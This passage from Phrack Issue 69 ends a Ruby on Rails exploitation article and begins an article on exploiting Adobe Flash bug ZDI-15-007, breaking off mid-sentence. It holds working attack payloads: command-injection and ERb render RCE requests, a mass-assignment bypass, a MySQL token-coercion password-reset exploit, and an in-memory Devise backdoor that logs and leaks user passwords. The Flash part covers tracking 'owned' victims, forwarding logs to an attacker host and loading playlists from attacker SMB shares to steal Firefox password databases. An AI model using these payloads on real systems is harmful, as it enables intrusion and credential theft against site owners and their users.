        "created_at": "2012-02-12T02:00:00+02:00",
        "current_login_at": "2013-08-26T22:12:05+03:00",
        "current_login_ip": "61.143.60.146",
        "deleted_at": null,
        "email": "aaron@example.com",
        "first_name": "Aaron",
        "google": "",
        "id": 1,
        "last_login_at": "2013-08-24T22:20:06+03:00",
        "last_login_ip": "122.173.185.99",
        "last_name": "Assembler",
        "last_request_at": "2013-08-26T22:13:35+03:00",
        "login_count": 481,
        "mobile": "(800)555-1211",
        "password_hash": "[...]",
        "password_salt": "[...]",
        "perishable_token": "NE0n6wUCumVNdQ24ahRu",
        "persistence_token": "...",
        "phone": "(800)555-1210",
        "single_access_token": "TarXlrOPfaokNOzls2U8",
        "skype": "ranzitreddy",
        "suspended_at": null,
        "title": "VP of Sales",
        "updated_at": "2013-08-26T22:13:35+03:00",
        "username": "aaron",
        "yahoo": ""
    }

  }

The format parameter could, depending on the actual app's routes be either
just a appended .json/.xml or a query parameter "format=json"/"format=xml"
within the URL.

In some rarely but seen in the wild cases there are even "format=js"
renderes which yield vulnerabilities. Imagine a user's inbox at:

  http://some.host/inbox/messages

When here the JavaScript renderer emits e.g. JQuery framgents like:

  $("#messages").hmtl("here goes the user's inbox")

We just might include

   <script src="http://some.host/inbox/messages?format=js"></script>

on a third party website and leak the users' inbox. This is pretty much the
same concept like a JSONP leak.


--[ 2.3 - Code / Command Execution

Now off to the real fun: different ways to execute your code on other
people's web servers.


--[ 2.3.1 - Classical OS Command Injection

The classical command injection patterns of course also apply to Ruby on
Rails applications.

Things to watch out for include:

* `command`
* %x/command/
* IO.popen(command)
* Kernel.exec
* Kernel.system
* Kernel.open("| command")

This list is not complete in any way, as there are many other Rubygems
implementing wrappers around those functions (also maybe I've just missed
for instance open3 in this list). As the average Phrack reader should be
pretty familiar with the concept of OS command injection flaws we do not
bother to further elaborate on this type of issue ;P.

A little sidenote on Kernel.open(): when the first character in the
argument to Kernel.open is a pipe, the method basically behaves like popen.
And the rest of the string after the pipe is taken as a command line.


--[ 2.3.2 - eval(user_input) and Friends

Things get a bit more interesting when it comes to RoR constructs which end
up in eval()ing user input. Here, due to Rubys' endless possibilities of
dynamic programming and monkey patching, things get a bit more interesting.
Hints on how to utilize in-framework code execution are given in section 4.

With the following methods we can evalute nifty payloads within the apps'
runtime/environment:

* eval
  within the current context
* instance_eval
  within the context of the current instance of a class
* class_eval
  within the context of a class itself

In occurrences of such in-framework evaluation of attacker-given inputs,
we can pretty much redefine and access anything within the application.


--[ 2.3.3 Indirections

Another fun thing when it comes to monkey patching and dynamic (hooray!)
programming are indirections introduced by calling one of the following
methods on user input:

* send
* __send__
* public_send
* try

What send et.al. do is calling a method denoted by the first parameter,
which might be a string or a symbol, and passing the further arguments to
the called method.

So imagine (this is actually not too imaginary [4]) the following
construct:

  send(params[:a],params[:b])

Easy enough we can turn this into in-Framework RCE by supplying:

  a=eval&b=whatever%20ruby%20code%20we%20like

The main differences between the above listed methods are:

* send  and __send__: none
* send and try: try is defined within Rails and just silently drops all
  exceptions which might occur
* public_send will only call public methods on an object

The limitation of public_send however can be bypassed as send itself is
public:

  irb(main):002:0> "".public_methods.grep /send/
  => [:send, :public_send, :__send__]

The above construction of having at least two, and most importantly the
first argument to __send__ under control however is rather rare. Mostly
you will see the code like:

  Thing.send(:hard_coded_method_name, params[someparam])

As the method to be called is hard coded we cannot leverage arbitrary code
execution unfortunately.


--[ 2.4 - Mass assignments

Mass assignments were a pretty popular exploit target in Rails 3. The
underlying concept is, that the application assigns arbitrary values of the
model when being saved:

app/controller/users_controller.rb:

  def update
    @user = User.find(params[:id])
    respond_to do |format|
      if @user.update_attributes(params[:user])

If the User model has e.g. an "admin" attribute any user might promote
themselves to admin by just posting that attribute towards to the
application.

A common malpractice which tries to prevent Mass Assignments is shown in
the code sample below:

app/controller/users_controller.rb:

  def update
    @user = User.find(params[:id])
    params[:user].delete(:admin) # make sure to protect admin flag
    respond_to do |format|
      if @user.update_attributes(params[:user])
      [...]

Within this controller and the usage of Multiparameter Attributes as
introduced in section 1.4.2 we can bypass the params[:user].delete(:admin)
sanitization as with the following payload:

  user[admin(1)]=true

As the multiparameter attribute gets parsed in user.update_attributes, the
protection params[:user].delete(:admin) will not catch the user[admin(1)]
attribute, allowing us to elevate our privileges. This is simply due to the
fact that the parameter within the controller will be "admin(1)" as in
contrast to "admin", the actual assignment of admin(1) to the admin flag
happens in the update_attributes call.

The proper way to prevent attributes from being automatically assigned
within Rails 3.x would be the usage of attr_accessible to define which
attributes are whitelisted for mass assignment.


--[ 2.5 - Regular Expressions

Ruby has a special handling of regular expressions, the regexps are
matching by default in multi-line mode. This is not the case for instance
in Perl or other programming languages.

To demonstrate this behavior compare the two command lines below:

  $ perl -e '$a="foo\nbar"; $a =~ /^foo$/ ? print "match" : \
    print "no match"'
  no match

  $ ruby -e 'a="foo\nbar"; if a =~ /^foo$/; puts "match"; \
    else puts "no match"; end'
  match

The string "foo\nbar" does not match the regular expression /^foo$/ in the
Perl code snippet, it is matching in the Ruby code snippet.

The main problem with this regular expression handling is that quite a lot
of developers are not aware of this subtle difference. This results in
improper checks and validations. As an example the controller below comes
close to what can be observed in real world code (the regex is somewhat
simplified here):

  class PingController < ApplicationController
    def ping
      if params[:ip] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/
        render :text => `ping -c 4 #{params[:ip]}`
      else
        render :text => "Invalid IP"
      end
    end
  end

The developer's expectation is to match only numbers and dots within the
above IP address validation. But due to the default multi line mode of
Ruby's regular expression parser the above check can be circumvented by a
string like "1.2.3.4.\nsomething". The $ in the above regex would stop at
\n therefore the above code is command injectable with a simple request
like this:

  $ curl localhost:3000/ping/ping -H "Content-Type: application/json" \
  --data '{"ip" : "127.0.0.999\n id"}'

Instead of using ^ and $ \A and \z should be used to match the beginning
and end of the string, rather than the beginning or end of the line.

Another common usecase of this RegEx behavior is the verification of user
given links. So for instance the RegEx /^https?:\/\// is bypassable by
supplying a link like:

  "javascript:alert('lol')/*\nhttp://*/" (note the newline)

When this input is rendered into a href attribute of an anchor tag, we've
gotten a straight froward Cross-Site Scripting.


--[ 2.6 Renderers

The render statement in RoR is used to render different templates or just
plain text towards the users Browser like:

  render text: "Ohai World!"

If we are in the lucky postition to see something like this:

  render params[:t]

We are able to inject ERb content by supplying a parameter t of:

  t[inline]=<%=`id`%>

  curl 'localhost:3000/?&t\[inline\]=%3c%25=%60id%60%25%3e'

This works due to the fact that the render statement takes a hash as
argument which will be in the above case:

  inline: "<%=`id`%>"

Where the inline renderer expects an ERb string. Et voila here we go with
user supplied code to be executed.


--[ 2.7 Routing

The file config/routes.rb describes which Controllers are reachable under
which path and HTTP verb, so for instance:

  post "user/add" => "users#add_user"

would expose the method add_user from the UsersController at the path
'/users/add' via a Post request. A common mistake however is a default
catch-all route like the following:

  match ':controller(/:action(/:id))(.:format)', via: [:get, :post]

This would expose every public method from every Controller being
accessible both via GET and POST requests. The main problem with such a
catch-all route is, that it completely subverts the RoR CSRF protection,
as GET requests are assumed to be not state changing, and therefore are
white-listed within the CSRF protection. So in the above example with the
two given routes an attacker would just CSRF something like:

  http://vict.im/user/add?user[name]=haxx0r&user[password]=h4x0rp455&
    user[admin]=1

In order to subvert the CSRF protection which was intended by the 'post'
statement in the routes.


--[ 3 - My favourite technique - CVE-2013-3221

This section is dedicated to my favourite RoR attack technique, which was
initially NOT addressed by issuing CVE-2013-3221.

The issue described in CVE-2013-3221 is a neat way to abuse MySQL's
automagic type conversion in order to e.g. reset arbitrary passwords within
some Ruby on Rails applications (including but not limited to the BlackHat
CFP Review System [5]).

Let's first have a look at MySQL and how it compares numbers to strings:

  mysql> SELECT 123 FROM dual WHERE 1=1;
  +-----+
  | 123 |
  +-----+
  | 123 |
  +-----+
  1 row in set (0.00 sec)

  mysql> SELECT 123 FROM dual WHERE 1="1";
  +-----+
  | 123 |
  +-----+
  | 123 |
  +-----+
  1 row in set (0.00 sec)

  mysql> SELECT 123 FROM dual WHERE 1="1somestring";
  +-----+
  | 123 |
  +-----+
  | 123 |
  +-----+
  1 row in set, 1 warning (0.00 sec)

  mysql> SELECT 123 FROM dual WHERE 1="somestring";
  Empty set, 1 warning (0.00 sec)

  mysql> SELECT 123 FROM dual WHERE 0="somestring";
  +-----+
  | 123 |
  +-----+
  | 123 |
  +-----+
  1 row in set, 1 warning (0.00 sec)

A pretty common technique for password resets in web applications is to
send out a token via email to the user. This token lets the user reset the
password right away.

In Ruby on Rails such a reset process would roughly look like this:

  # PasswordController

  def reset
    user = User.find_by_token(params[:user][:token])
    if user
      #reset password here
    end
  end

Such a token like the one pulled out of params in the code above typically
is a random string, for now let's just assume this string is
"IAmARandomToken". Given the knowledge about the MySQL typecasting plus the
facts about JSON/XML input described in section 1.1.3 & 1.1.4 we can
conduct an actual attack on this pattern.

MySQL would match the string "IAmARandomToken" with the number 0 so a
possible exploit would look like:

  curl http://phrack.org/password/reset \
  -H 'Content-Type: application/json' \
  --data '{"user":{"token":0,"pass":"omghaxx","pass_confirm":"omghaxx"}}'

This attack vector got addressed with a security announcement [6] which
said it will be fixed somewhen later.

A little anecdote on this issue:

A couple of days after the advisory the issue was "fixed" in Rails 3.2.12
as by the following commit [7], no further advisory was released for this
issue. The fix in 3.2.12 was first of all incomplete due to the fact that
it was bypassable by POSTing an array of numbers instead of a single
number. Secondly Rails went back to the original behaviour with the
release of 3.2.13.

Indeed the vector is completely fixed as of Rails 4.2 almost two years
after the original advisory.


--[ 4 - Notes on Code Injection Payloads

The wonderful world of Ruby on Rails gives us, in case of in-framework code
injection, a lot of toys to play with. As the whole framework is available
to the attacker its' whole featureset might be utilized. This starts with
very simple but convenient things:

In 2.1 code execution via unmarshalling of the session cookie was
elaborated. A very handy data exfiltration technique for small (<4K)
amounts of data is using the session cookie itself to carry the
exfiltrated data out [/* Eat this, WAF */].

The to-be-executed payload to use this technique would roughly be the
following:

  lootit=<<WOOT
  a={} # This will end up as our session object
  a['loot'] = User.find_by_email("admin@app.com").password # Guess what :P
  a # return a as session hash
  WOOT

The above _string_ then is used in a cookie using the RCE technique from
2.1. If done all right the response to that cookie will contain another new
cookie which contains a 'loot' key which has the value of the requested
data.

Anything goes with Ruby: Imagine an app where the passwords are properly
salted and hashed and streched and whatnot. In order to not waste any GPU
time for breaking the precious hashes we could instead inject some code
which re-writes the apps login controller in a way that it will first log
out all users, and then log all the sent passwords in memory until they are
fetched by defined request. A PoC for this technique against the devise
authentication framework is shown in [8]. The main component of it is the
actual to-be-evaluated payload:

Devise::SessionsController.class_eval <<DEVISE
@@passwordsgohere = []
@@target_model = nil
@@triggerword = "22bce2630cb45cbff19490371d19a654b01ee537"
@@secret =
  "12IO0nCNPFhWz7a56rmhkiIQ8BOgbUw7yIYl++jYNkxAseBT3Q02N+CwShuqDBqY"
def logallthepasswords
  @@target_model= @@target_model || ActiveRecord::Base.subclasses.collect
{|c| c if c.methods.include? :devise }.first.model_name.param_key
  if params[@@target_model]
    @@passwordsgohere<< params[@@target_model]
  end
end
def leakallthepasswords
   keygen = ActiveSupport::KeyGenerator.new(@@secret,{:iterations => 1337})
   enckey = keygen.generate_key('encrypted hacker')
   sigkey = keygen.generate_key('signed encrypted hacker')
   crypter = ActiveSupport::MessageEncryptor.new(enckey,
sigkey,{:serializer => ActiveSupport::MessageEncryptor::NullSerializer })
   if Digest::SHA1.hexdigest(session["session_id"].to_s) == @@triggerword
     render :text => crypter.encrypt_and_sign(JSON.dump(@@passwordsgohere))
     @@passwordsgohere = []
   end
end
before_filter :logallthepasswords
before_filter :leakallthepasswords
DEVISE

The above code, when RCEd into a Ruby on Rails application using devise
will introduce two filters in the apps login Controller, one filter called
logallthepasswords which keeps every password and username in memory upon
login. Secondly the leakallthepasswords filter will dump those passwords
upon seeing a specific session id and flush them from memory.

Key takeaway here (which does not only apply to RoR applications) is
actually the fact that we can model our own little application within some
target app pretty much freely when using eval() or session cookie based
RCE payloads. Another fun fact about this is the circumstance that the
payload will reside in memory. Once the app is shut down your payload is
gone. And by giving up the persistence we will pretty likely win against
the forensics guy.


--[ 5 - Greetz and <3

In no particular order:

  astera, greg (thx for kicking my ass), FX, nowin, fabs, opti,
  tina, matteng, RL, HDM, charliesome, both Bens (M. and T.),
  larry0 (Gemkiller).

The award for endless patience with this little writeup goes to the Phrack
Staff obviously ;).


--[ A - References

[0] http://rubyonrails.org
[1] https://github.com/rails/rails/commit/
      c9909db9f2f81575ef2ea2ed3b4e8743c8d6f1b9
[3] http://www.phenoelit.org/stuff/ffcrm.txt
[4] https://github.com/rapid7/metasploit-framework/blob/master/modules/
      exploits/multi/http/spree_searchlogic_exec.rb
[5] https://www.blackhat.com/latestintel/04302014-poc-in-the-cfp.html
[6] https://groups.google.com/group/rubyonrails-security/browse_thread/
      thread/64e747e461f98c25
[7] https://github.com/rails/rails/commit/
      921a296a3390192a71abeec6d9a035cc6d1865c8
[8] https://github.com/joernchen/DeviseDoor


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x0d of 0x10

|=-----------------------------------------------------------------------=|
|=---------------=[       The Art of Exploitation       ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------=[ Obituary for an Adobe Flash Player bug ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ huku ]=-------------------------------=|
|=------------------------=[ huku@grhack.net ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of contents

0 - Introduction
1 - Preparing a debugging environment
    1.1 - Your first AS3 "Hello, World!"
    1.2 - Printing output
2 - Useful ActionScript classes
    2.1 - Marking owned clients
    2.2 - Preventing the unresponsive script pop-up from showing up
3 - The bug
    3.1 - Analysis
    3.2 - Exploitation
        3.2.1 - Assessment
        3.2.2 - From relative to absolute information leak
        3.2.3 - Discovering Flash Player base address
        3.2.4 - Discovering the CRT heap address
        3.2.5 - Walking CRT heap allocations
        3.2.6 - Reading arbitrary files
        3.2.7 - Overall exploit methodology
        3.2.8 - Logz
4 - Conclusion
5 - Thanks
6 - References
7 - Codez


--[ 0 - Introduction

The 21st of January was a sad day. A beautiful vulnerability, ZDI-15-007
[01], was killed by a person using the alias "bilou". It was one of those
days that some people had to fire up IDA Pro again and start reversing in
search of new 0days. Yes, this article will deal with some Adobe Flash
exploitation, as if the P0 circus was not enough already (to which the
author regrets having taken part by posting comments a couple of times).

Let's get this straight, Adobe Flash is indeed high in a security
researcher's audit list, and there's a good reason for that, but all this
defamation against Adobe's products, is, obviously well lead by other
coorporate organizations whose products are not less vulnerable [04]. It's
kinda funny how Firefox, for example, #2 in the list of top 50 products by
total number of distinct vulnerabilities (according to [03]), denies to
activate a vulnerable Adobe Flash plug-in, listed under #15. How wonderful
would it be if Flash did the same? Imagine Flash, for example, denying to
run on shitty browsers [02]. In a security circus where famous security
researcher celebrities have chosen sides, we suggest that hackers benefit
from both sides' idiocy.

This article will deal with the aforementioned vulnerability. We will show
how it can be leveraged to disclose, not only sensitive information from a
sandboxed Adobe Flash process, but other sensitive information from the
target's filesystem as well. More specifically, we will focus on how it's
possible to steal the Firefox SQLite databases containing stored passwords,
encryption keys and cookies from a victim's computer. These passwords, can
then be used to access the target machine via other means thus allowing one
to indirectly, escape the sandbox restrictions imposed by Adobe Flash on
Firefox. Since our 0days have long stopped working, it's a good chance for
us to share our experience with the community.

This article is organised as follows. The first section deals with how a
working/debugging environment for Flash development is set up. We believe
that this will help the interesting reader get started with Adobe Flash
exploitation and will aid him/her in discovering his/her own 0day
vulnerabilities. The second section deals with certain problems that may
arise during client side exploitation and presents simple ActionScript
tricks that can be used to resolve them. Last but not least, the third
section analyzes the actual vulnerability and the steps taken to achieve
arbitrary file stealing by abusing a simple information/memory disclosure
primitive.

It should be noted that the code snippets and other information presented
in the remainder of this article correspond to version 15.0.0.189 of the
NPAPI release of Adobe Flash Player. The vulnerability is present in older
versions as well, but the author was unable to find older IDA Pro databases
in his hard drive :P


--[ 1 - Preparing a debugging environment

Before delving into the specifics of ZDI-15-007, let's have a look at
preparing the minimal toolset for compiling, running and debugging
ActionScript code. To avoid using complex commercial IDEs, we will limit
ourselves to publicly available open source software instead, which is more
than enough for building SWF objects. The development toolchain for
ActionScript applications consists of the following components:

  * The FLEX SDK distributed by the Apache Foundation [05] or Adobe [06].
    You should stick with the first. Just visit the Apache foundation
    homepage and download the automated installer.

  * The runtime targeting the Flash version of interest. Usually named
    "playerglobal.swc". This is automatically downloaded for you by the
    Flex SDK installer. You can always grab the latest version from [17].

  * Your favorite console editor (vim, emacs, nano, whatever).

I guess all Phrack readers know how to install stuff, so I'll leave this as
an exercise to the reader :P

As an alternative to the above, one may use Haxe [20]. Haxe allows a
developer to write code using a strictly typed programming language and
then compile it, or even cross-compile it, to a set of possible target
runtimes. Adobe Flash is in the list of supported application runtimes.
In this article, however, we will stick to the first of the two options,
but Haxe is also worth exploring from an attacker's perspective.


----[ 1.1 - Your first AS3 "Hello, World!"

Fire up your favorite text editor and create a file named "Test.as" with
the following contents. Just like Java, AS3 source code files are named
after the public class they declare.


--- snip ---
package
{
    import flash.display.Sprite;

    public class Test extends Sprite
    {
        public function Test()
        {
            trace("Hello, world!\n");
        }
    }
}

// vim: set syntax=cpp:
--- snip ---


Unless you have a vim syntax file for AS3, the last comment will put some
color in your editor.

The following is a typical Makefile used to build "Test.swf" from
"Test.as". Before running `make', make sure you have set `SDK_PREFIX' to
the directory where you have installed the Flex SDK.


--- snip ---
SDK_PREFIX=/var/flex

MXMLC=$(SDK_PREFIX)/bin/mxmlc
MXMLC_FLAGS=-compiler.optimize -warnings

SRCS=Test.as
BIN=Test.swf

all:
    $(MXMLC) $(SRCS) $(MXMLC_FLAGS) -output $(BIN)

.PHONY: clean
clean:
    rm -fr $(BIN)
--- snip ---


Running `make' will generate the required SWF file.


--- snip ---
$ make
~/flex/bin/mxmlc Test.as -compiler.optimize -warnings -output Test.swf
Loading configuration file ~/flex/frameworks/flex-config.xml
Test.swf (581 bytes)
--- snip ---


----[ 1.2 - Printing output

Admittedly, the best way of debugging code is printing output (who needs
`gdb' anyway?). The AS3 API provides a function named `trace()' which is
used to produce debugging messages. However, the messages can only be
viewed when a debugging version of Adobe Flash Player is used and the SWF
is run from within Flash Builder Studio. This is bad news; no clients use a
debugging version of Flash and I prefer spending 50$ for anything other
than buying Flash Studio :)

I can think of at least two cases where output messages can be useful:

  * During development; seeing what's wrong with your exploit is fastest
    way of resolving issues with your code and improving your exploit's
    reliability.

  * During production; watching clients being owned - priceless :)

For the first case output messages can be printed directly in the users
browser. For the second case, logs can be forwarded to a remote log server
controlled by the attacker. `Console' class, implemented in file
"Console.as" in the attached exploit, is capable of performing both. The
boolean constants `LOCAL_DEBUG' and `REMOTE_DEBUG' control what kind of
logging strategy is used:


--- snip ---
public class Console
{
    // Print messages to a standard text field.
    private const LOCAL_DEBUG:Boolean = true;

    // Forward messages to remote host. Our tool, named `xmlsocketd.py', is
    // supposed to be waiting there for incoming connections.
    private const REMOTE_DEBUG:Boolean = true;
    private const REMOTE_HOST:String = "1.2.3.4";
    private const REMOTE_PORT:int = 1234;

    ...
}
--- snip ---


When `LOCAL_DEBUG' is set to `true', as shown above, a text field is
created and logs are written in it. The text field is automatically
resized and the output scrolls down just like your favorite terminal
emulator. If `REMOTE_DEBUG' is true, an XML socket is used to forward
messages to a remote machine.

The attached exploit comes with a simple Python server that receives the
messages and writes them in a SQLite database. A simple web interface can
be used to view them.


--[ 2 - Useful ActionScript classes

Let's forget about the actual vulnerability for a moment and let's focus on
various problems that may arise during the exploitation process. Each of
the following sections deals with such a problem and presents a simple
solution.


----[ 2.1 - Marking owned clients

A first problem that may arise when writing AS3 exploits (in fact, during
client side exploitation in general) is how already exploited clients are
distinguished from clients on which the exploit failed and clients that are
targeted for the first time. If for some reason the exploit fails on a
client, maybe because the Flash Player plug-in crashed because of accessing
an unmapped memory address for example, it's good not to run the exploit
again next time the client in question refreshes the malicious web page. A
means to achieving this kind of behavior is using some kind of persistent
information on the client's side. The two most well known methods are the
following:


    * Cookies. We all know and kinda love cookies.

    * JavaScript persistent storage APIs

        * HTML5 web storage [07]

        * WebSQL [08]. Nowadays considered obsolete, but some browsers
          still support it


Even though the mechanisms above can indeed be used as a possible solution,
they both come with their drawbacks. Cookies are not that reliable (e.g.
private browsing, cookies being cleaned up when the browser exits), while a
JavaScript based solution requires some form of communication between the
JavaScript code and our Flash exploit. Even though this is possible [09],
it kind of complicates things. A pure AS3 solution is preferred.

For the sake of developing the attached Flash exploit, I decided to make
use of ActionScript's `SharedObject' class [10]. This API allows for
managing persistent storage on the clients side directly from the AVM
engine and it's as simple as the equivalent JavaScript APIs. An additional
benefit is that browsers usually don't clean the, so called, Flash cookies
and thus marking a client this way may be better and more reliable.

The logic is implemented in `Persistence.as' and consists of two simple
methods, namely `is_marked()', for testing wether a client has been marked,
and `mark()' that uses persistent storage to mark a victim. The code for
`is_marked()' is shown below:


--- snip ---
public static function is_marked():Boolean
{
    var ret:Boolean = true;
    var lso:SharedObject = SharedObject.getLocal(Persistence.ID);

    // If cookie not present, or more than the specified amount of time has
    // elapsed, the client is not considered marked.
    if(!("time" in lso.data) ||
            (new Date()).time - lso.data["time"] >= Persistence.INTERVAL)
        ret = false;

    lso.close();
    return ret;
}
--- snip ---


The code checks if a cookie with a chosen name, `Persistence.ID', already
exists in the victims computer. The cookie is supposed to hold the
timestamp of the last exploit attempt. If more than `Persistence.INTERVAL'
milliseconds have elapsed since that time, or if the cookie does not exist
in the victim's computer, then the client is considered unmarked and the
exploitation proceeds. Otherwise, the exploit exits immediately.
Successful exploitation attempts result in the victim being marked, so that
the malicious SWF is not activated again if the user refreshes the
container HTML page.


--- snip ---
public static function mark():void
{
    var lso:SharedObject = SharedObject.getLocal(Persistence.ID);
    lso.data["time"] = (new Date()).time;
    lso.flush();
    lso.close();
}
--- snip ---


In the attached exploit a client is marked by installing a Flash cookie
named "cookie".


----[ 2.2 - Preventing the unresponsive script pop-up from showing up

As it wil become apparent later, successful exploitation of the analyzed
vulnerability takes a certain amount of time. It's important, for example,
that, until all the required files from the victim's computer have been
uploaded to the attacker's server, the whole exploitation process is not
interrupted. A common problem, that arises when exploiting
"plugin-container.exe" processes, is the unresponsive script pop-up shown
by Firefox (why this happens is out of the scope of this article). This
section deals with the aforementioned problem and presents a simple
solution, implemented in the attached exploit, for avoiding annoying
browser pop-ups.

Just like JavaScript, ActionScript has its own implementation of web
workers, an abstraction over an operating system's threading mechanism.
Using web workers allows for running several SWF files in parallel which,
in turn, allows for executing the main exploitation logic in separate
thread, thus not keeping the main plug-in thread busy. While the
exploitation process is carried out in the background, the attacker can,
for example, present a silly Flash game to the victim to buy some time.
Embedding an exploit to your favorite porn movie is also a good idea :P

The exploit's entry point, which for obvious purposes was named "Main",
looks like the following:


--- snip ---
public class Main extends MovieClip
{
    // Array of URIs to worker SWF files; add extra workers here.
    private const workers:Array = new Array("WorkerMain.swf");

    public function Main()
    {
        this._mcv = new Vector.<MessageChannel>();
        this._con = new Console(this);

        if(Persistence.is_marked() == false) // (1)
        {
            for each(var swf_url:String in this.workers)
            {
                this._con.msg("Will now load worker from " + swf_url);
                swf_url += "?rnd=" + getTimer().toString(16);
                var req:URLRequest = new URLRequest(swf_url);
                var ldr:URLLoader = new URLLoader();
                ldr.dataFormat = URLLoaderDataFormat.BINARY;
                ldr.addEventListener(Event.COMPLETE, this._on_complete);
                ldr.load(req);
            }
        }
        else
            this._con.msg("Target is marked");
    }
}
--- snip ---


At (1), the `Persistence' class (presented in the previous section) is used
to check if the client has already been successfully exploited from a
previous run of the exploit. If not, or if this is a new client, the SWF
files specified in the `workers[]' array are loaded one by one using URL
requests (the "?rnd=" URL parameter is used for avoiding possible caching
from the client's side, a common trick used by scripting languages). Method
`_on_complete()' is executed for each worker successfully loaded from its
corresponding URL. Eventually each worker starts running by calling the
`start()' method.


--- snip ---
private function _on_complete(evt:Event):void
{
    ...

    worker.start();
    this._con.msg("New worker started");
}
--- snip ---


This function will also create a `MessageChannel' instance for each worker,
so that asynchronous communication with the main thread is possible. In the
attached exploit, the message channel is used by the workers to forward
debugging messages to the main thread, who will, in turn, forward them to
the output stream specified in "Console.as". The relevant code is not
presented here, as this feature is just a minor, but useful, detail of the
exploit.


--[ 3. The bug

----[ 3.1 Analysis

TL;DR, the vulnerability lies in method `getABRProfileInfoAtIndex()' of
class `AVSegmentedSource'. Unfortunately, at the time of writing, the
`AVSegmentedSource' API is still undocumented. Any information, that will
be presented in the following sections, was recovered by reverse
engineering the ActiveX and NPAPI versions of Adobe Flash. The bug was also
present in the PPAPI version of Chrome (a.k.a. "pepperflash.dll"), but the
author didn't have enough time to investigate further.

`AVSegmentedSource' is the class responsible for HLS playback. According
to Wikipedia [11]:

    HTTP Live Streaming (also known as HLS) is an HTTP-based media
    streaming communications protocol implemented by Apple Inc. as part of
    its QuickTime, Safari, OS X, and iOS software. It works by breaking the
    overall stream into a sequence of small HTTP-based file downloads, each
    download loading one short chunk of an overall potentially unbounded
    transport stream. As the stream is played, the client may select from
    a number of different alternate streams containing the same material
    encoded at a variety of data rates, allowing the streaming session to
    adapt to the available data rate.

To start playback, a client has to load a, so called, HLS manifest, which
is simply an .m3u or .m3u8 (unicode version of .m3u) playlist. Wikipedia
[11] explains:

    At the start of the streaming session, it downloads an extended M3U
    playlist containing the metadata for the various sub-streams which are
    available.

The following snippet shows how one can do that programmatically in AS3.


--- snip ---
var source:AVSegmentedSource = new AVSegmentedSource();
var stream:AVStream = new AVStream(source);
...

stream.load("C:\\playlist.m3u8");
stream.play();
--- snip ---


People familiar with ActionScript development should have already noticed
that the path given as the first argument to `load()' is the filename of a
local file residing in the user's filesystem (back when I was developing
this exploit, `load()' failed when a URL was passed to it, maybe this
problem has been fixed by now). This, however, kind of contradicts the
sandbox model of Adobe Flash; Flash applications are not allowed to write
or even read local files. So, how is a SWF movie supposed to load an HLS
manifest, if it has to write it to the user's filesystem first?

Unless `load()' supports URLs in recent versions of Flash Player, playback
of HLS streams is not supported on platforms other than Microsoft Windows;
on Windows systems, one can bypass this limitation by using UNC paths,
either in the standard "\\server\path" format or using the WebDAV notation
"\\server@port\path", which, unfortunately, is not supported on Windows
versions greater than Microsoft Windows 7. An attacker can place an
arbitrary M3U8 playlist on a SMB/SAMBA server under his or her control and
have the target client load it as shown below:


--- snip ---
// Works on all Microsoft Windows versions.
stream.load("\\\\1.2.3.4\\exploit\\playlist.m3u8");
stream.play();

// Works only on Microsoft Windows 7 and probably XP.
stream.load("\\\\1.2.3.4@8080\\exploit\\playlist.m3u8");
stream.play();
--- snip ---


As a side note, the author would like to stress the fact that this article
will not deal with the server component of the attached exploit that serves
the malicious M3U8 files. The interested reader is advised to have a look
at "m3u8.php", "dumper.php" and the relevant code in "WorkerMain.as". These
details have been intentional left out so that the reader's attention is
not focused on simple technical issues like setting up Samba, Apache, DAV
and so on. For more information have a look at "README.md" in the exploit's
top-level directory.

HLS is quite flexible. An M3U8 playlist may specify the same media source
(e.g. your favorite porn video) in various encodings and various bitrates.
This way clients can adapt based on availability of bandwidth or other
resources. Additionally a media source is allowed to be broken in smaller
pieces, called periods, so that clients can faster seek to the required
time location. Since the author is not really a media guy, the information
and terminology in the following paragraphs is presented ad referendum.

Let's see an example M3U8 manifest taken from [16]:


--- snip ---
#EXTM3U

#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=150000,RESOLUTION=416x234, \
CODECS="avc1.42e00a,mp4a.40.2"
http://example.com/low/index.m3u8

#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=240000,RESOLUTION=416x234, \
CODECS="avc1.42e00a,mp4a.40.2"
http://example.com/lo_mid/index.m3u8

#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=440000,RESOLUTION=416x234, \
CODECS="avc1.42e00a,mp4a.40.2"
http://example.com/hi_mid/index.m3u8

#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=640000,RESOLUTION=640x360, \
CODECS="avc1.42e00a,mp4a.40.2"
http://example.com/high/index.m3u8

#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=64000,CODECS="mp4a.40.5"
http://example.com/audio/index.m3u8
--- snip ---


The manifest shown above defines 5, so called, bitrate profiles for the
same media source. A client can choose any of these. For example, a low
bandwidth client would pick the first entry and would proceed by loading
the M3U8 manifest specified in the first "#EXT-X-STREAM-INF" entry. In
turn, this manifest may look like the following:


--- snip ---
#EXTM3U
#EXT-X-PLAYLIST-TYPE:EVENT
#EXT-X-TARGETDURATION:10
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10,
fileSequence0.ts
#EXTINF:10,
fileSequence1.ts
#EXTINF:10,
fileSequence2.ts
#EXTINF:10,
fileSequence3.ts
#EXTINF:10,
fileSequence4.ts
...
#EXTINF:10,
fileSequence120.ts
#EXTINF:10,
fileSequence121.ts
#EXT-X-ENDLIST
--- snip ---


The tag names starting with the hash character are not relevant right now.
What is important is that the files named "fileSequenceXXX.ts" correspond
to the media source's periods.

Once loading of the HLS manifest is complete, the `AVSegmentedSource'
instance may be used for querying information about the loaded manifest.
One of the several methods exported by this class is
`getABRProfileInfoAtIndex()'. The prototype of this API is shown below:


--- snip ---
getABRProfileInfoAtIndex(periodIndex:int, abrProfileIndex:int):
    AVABRProfileInfo
--- snip ---


The API requires two integers, the period index (the index of the media
source piece) and the bitrate profile index. For example, to query the
profile information for the period "fileSequenece1.ts" of the low bandwidth
profile, one might do the following:


--- snip ---
source.getABRProfileInfoAtIndex(1, 0);
--- snip ---


The reader should have already guessed where the actual bug lies. The
second argument passed to this API is not checked. The bug can be triggered
